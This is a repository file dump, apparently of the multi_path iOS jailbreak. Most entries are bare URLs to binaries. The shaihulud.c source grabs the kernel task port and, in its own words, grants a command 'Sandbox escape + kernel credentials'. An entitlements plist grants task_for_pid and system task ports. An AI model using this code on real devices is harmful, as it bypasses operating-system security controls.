--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/ping


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/shutdown:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/shutdown


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/umount:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/umount


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/test:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/test


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/amfid_payload.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/amfid_payload.dylib


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/arch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/arch


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/chflags:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/chflags


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/clear:
--------------------------------------------------------------------------------
1 | printf "\e[1;1H\e[2J"
2 | 


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/cut:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/cut


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/du:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/du


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/false:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/false


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/find:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/find


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/fs_usage:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/fs_usage


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/grep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/grep


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/gunzip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/gunzip


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/gzip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/gzip


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/head:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/head


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/hexdump:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/hexdump


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/hostinfo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/hostinfo


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/id:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/id


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/inject_criticald:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/inject_criticald


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/killall:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/killall


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/less:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/less


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/login:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/login


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/lsmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/lsmp


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/more:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/more


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/nano:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/nano


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/nohup:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/nohup


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/passwd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/passwd


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/plconvert:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/plconvert


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/printf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/printf


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/renice:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/renice


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/reset:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/reset


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/sc_usage:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/sc_usage


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/scp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/scp


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/screen:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/screen


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/script:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/script


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/sed:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/sed


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/seq:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/seq


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/split:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/split


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/sqlite3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/sqlite3


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/stat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/stat


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/syslog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/syslog


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/tail:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/tail


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/tar


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/tee:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/tee


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/time:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/time


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/true:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/true


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/tset:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/tset


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/uicache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/uicache


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/uname:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/uname


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/vim:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/vim


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/vm_stat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/vm_stat


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/w:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/w


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/wc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/wc


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/what:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/what


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/which:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/which


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/xargs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/xargs


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/xxd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/xxd


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dbclient:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dbclient


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dropbear:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dropbear


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dropbear.orig:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dropbear.orig


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dropbearconvert:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dropbearconvert


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dropbearkey:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dropbearkey


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dropbearmulti:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dropbearmulti


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/filemon:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/filemon


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/jlutil:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/jlutil


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/joker:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/joker


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/jtool:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/jtool


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/procexp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/procexp


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/procexp.ent:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 2 | <plist version="1.0">
 3 | <dict>
 4 |     <key>platform-application</key>
 5 |     <true/>
 6 |     <key>com.apple.private.security.sandbox.debug-mode</key>
 7 |     <true/>
 8 |      <key>com.apple.security.temporary-exception.sbpl</key>
 9 |         <array>
10 |                 <string>(allow signal)</string>
11 | 		<string>(allow process-info-listpids)</string>
12 | 		<string>(allow process-info*)</string>
13 |         </array>
14 |     <key>com.apple.security.exception.process-info</key>
15 |     <array/>
16 |     <key>get-task-allow</key>
17 |     <true/>
18 |     <key>task_for_pid-allow</key>
19 |     <true/>
20 |     <key>com.apple.system-task-ports</key> 
21 |     <true/>
22 |     <key>com.apple.private.network.statistics</key>
23 |     <true/>
24 |     <key>com.apple.wlan.authentication</key>
25 |     <true/>
26 |     <key>com.apple.private.security.container-required</key>
27 |     <false/>
28 | </dict>
29 | </plist>
30 | 


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/qilin.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/qilin.o


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/shaihulud:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/shaihulud


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/shaihulud.c:
--------------------------------------------------------------------------------
 1 | #include <mach/mach_port.h>
 2 | #include "QiLin.h"
 3 | #include <mach/kern_return.h>
 4 | 
 5 | #include <stdio.h>
 6 | 
 7 | void doNothing(void ) {};
 8 | int main (int argc, char **argv)
 9 | {
10 | 
11 | void setDebugReporter (status_func *Func);
12 | 
13 | 	setDebugReporter(doNothing);
14 | 
15 | 	mach_port_t	kernel_task;
16 | 
17 | 	kern_return_t host_get_special_port(task_t, int node, int which, mach_port_t *);
18 |         kern_return_t kr=host_get_special_port(mach_host_self(), 0, 4, &kernel_task);
19 | 
20 | 	if (argc < 2) {
21 | 		fprintf(stderr,"Usage: shaihulud _cmd_ [_args_]\n");
22 | 		fprintf(stderr,"Bestow the might of ShaiHulud (Sandbox escape + kernel credentials) on command\n");
23 | 		exit(1);
24 | 
25 | 	}
26 | 
27 | 	int slide = 0 ;
28 |  	FILE *ss = fopen("/tmp/slide.txt","r");
29 |         if (ss) { fscanf (ss, "0x%x", &slide);  fclose(ss); }
30 | 
31 | 
32 | 	int  rc = initQiLin (kernel_task,  0xfffffff007004000 + slide);
33 | 
34 | 	if (rc) { fprintf(stderr,"Qilin Initialization failed!\n"); return rc;}
35 | 
36 | 	int spawnAndShaiHulud (char *AmfidebPath, char *Arg1, char *Arg2, char *Arg3 , char *Arg4, char *Arg5);
37 | 	rc = spawnAndShaiHulud (argv[1], argv[2], NULL, NULL, NULL,NULL);
38 | 
39 | 
40 | }
41 | 


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/wget:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/wget


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/dropbear:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/dropbear


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/dropbear.orig:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/dropbear.orig


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/dropbearconvert:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/dropbearconvert


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/dropbearkey:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/dropbearkey


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/attr.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/attr.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/cap.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/cap.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/clone.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/clone.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/compctl.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/compctl.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/complete.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/complete.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/complist.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/complist.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/computil.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/computil.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/curses.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/curses.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/datetime.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/datetime.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/deltochar.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/deltochar.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/example.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/example.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/files.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/files.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/langinfo.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/langinfo.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/mapfile.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/mapfile.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/mathfunc.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/mathfunc.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/newuser.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/newuser.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/parameter.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/parameter.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/regex.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/regex.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/socket.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/socket.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/stat.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/stat.so


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/system.so:
--------------------------------------------------------------------------------
